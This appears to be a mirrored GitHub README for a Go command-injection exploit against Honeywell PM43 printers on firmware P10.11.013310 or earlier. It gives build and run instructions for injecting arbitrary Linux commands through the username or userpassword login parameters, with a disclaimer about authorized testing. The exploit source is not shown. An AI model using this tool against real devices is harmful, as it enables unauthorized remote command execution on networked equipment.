GithubHelp home page GithubHelp logo

honeywell-pm43-rce-exp's Introduction

Honeywell PM43 Command Injection Exploit

This repository contains a command injection exploit for PM43 devices. The exploit targets the PM43 device with firmware version P10.11.013310 or earlier, which is vulnerable to command injection.

Usage

  1. Clone the repository:

    git clone https://github.com/your-username/pm43-command-injection-exploit.git
  2. Change into the project directory:

    cd pm43-command-injection-exploit
  3. Build the exploit:

    go build
  4. Run the exploit with the following command:

    ./pm43-command-injection-exploit -u <target-url> -p <injection-parameter> -c <linux-command>

    Replace <target-url> with the URL of the vulnerable PM43 device.

    Replace <injection-parameter> with the parameter to be injected. It should be either username or userpassword.

    Replace <linux-command> with the Linux command you want to execute on the target device.

  5. The exploit will send a crafted POST request to the target device with the injected command. It will then check the response for successful command execution.

  6. If the command is executed successfully, the output will be displayed on the console.

Example

./pm43-command-injection-exploit -u http://target-device.com -p username -c "ls -la"

This example runs the exploit against the PM43 device at http://target-device.com, injecting the command ls -la into the username parameter.

Disclaimer

This exploit is for educational and testing purposes only. Use it responsibly and with proper authorization. The author is not responsible for any misuse or damage caused by this exploit.

Contributing

Contributions are welcome! If you find any issues or want to improve the exploit, feel free to create a pull request.

License

This project is licensed under the MIT License.

honeywell-pm43-rce-exp's People

Contributors

vpxuser avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.